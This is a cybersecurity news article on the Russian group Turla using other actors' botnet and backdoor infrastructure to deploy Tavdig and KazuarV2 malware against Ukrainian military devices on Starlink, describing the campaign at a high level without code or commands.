Russian Cyber-Espionage Group Turla Uses Other Hackers’ Infrastructure to Target Ukraine Military Devices

December 11, 2024

Russian cyber-espionage group Turla, also known as 'Secret Blizzard', is reportedly using the infrastructure of other threat actors to target Ukrainian military devices linked to Starlink. Microsoft and Lumen have recently unveiled the tactics of Turla, which is connected to Russia's Federal Security Service (FSB). The group has been using malware and servers of the Pakistani threat actor Storm-0156.

Microsoft has issued a new report detailing separate Turla operations that took place between March and April 2024, which targeted devices in Ukraine used in military operations. In this recent campaign, Turla used the infrastructure of the Amadey botnet and another Russian hacking group known as 'Storm-1837' to deploy their custom malware, including Tavdig and KazuarV2, on Ukrainian systems. Microsoft has not confirmed whether Turla hijacked Amadey or bought access to the botnet.

Turla's attacks in Ukraine usually start with phishing emails carrying malicious attachments, Storm-1837 backdoors, or the Amadey botnet, which is used for payload deployment on infected devices. Amadey, a malware botnet, has been used for initial access and payload delivery since 2018. In the case of Turla, it is used for deploying custom reconnaissance tools on compromised devices and to download PowerShell droppers that load the threat group's custom malware, Tavdig ('rastls.dll').

Microsoft has observed 'Secret Blizzard' downloading their custom reconnaissance or survey tool. This tool is selectively deployed to devices of further interest by the threat actor, for example, devices egressing from STARLINK IP addresses, a common signature of Ukrainian front-line military devices. The Starlink devices were presumably targeted to gather intelligence on front-line military activities, which aligns with Turla's role at the FSB.

Microsoft's report also connects Turla with another Russian threat actor known as Storm-1837, who, according to Microsoft, has previously focused on devices used by Ukrainian drone operators. Turla was seen using Storm-1837's Power-Shell backdoor named 'Cookbox', which Storm-1837 deployed in Ukraine in January 2024 by exploiting the WinRAR flaw CVE-2023-38831. Turla's custom malware families were later deployed on those systems, indicating that Storm-1837 was either hijacked or collaborated with Turla to deliver their payloads.

Tavdig and KazuarV2 are key elements of Turla's malware arsenal, playing distinct but complementary roles in their latest espionage campaign. Tavdig is a lightweight, modular backdoor designed to establish an initial foothold, conduct surveillance, and deploy additional payloads. KazuarV2, on the other hand, is Turla's more advanced, stealthy backdoor, designed for long-term intelligence collection, command execution, and data exfiltration. Microsoft advises defenders to refer to their proposed mitigations and hunting queries in the report, which cover this particular Turla operation and the group's broader activities.

Related News

• APT-K-47 Utilizes Hajj-Related Deception to Distribute Enhanced Asyncshell Malware
• 'SloppyLemming' APT Targets Government and Law Enforcement Agencies via Cloudflare
• Head Mare Hacktivist Group Targets Russia and Belarus Using WinRAR Vulnerability
• Global Cybersecurity Agencies Issue Joint Advisory on China-affiliated APT40's Quick Exploit Adaptation
• FlyingYeti Uses WinRAR Flaw to Deploy COOKBOX Malware in Ukraine

Latest News

• Cleo MFT Zero-Day Exploits Set to Surge: Cleopatra Backdoor and Ransomware Campaigns in Focus
• Ivanti Addresses Critical Vulnerabilities in its Cloud Services Appliance Solution
• Microsoft Resolves 72 Security Flaws, Including an Actively Exploited CLFS Vulnerability
• U.S. Accuses Chinese National of Hacking 81,000 Sophos Firewalls Using Zero-Day Exploit
• Termite Ransomware Group Suspected Behind Zero-Day Exploits in Cleo Software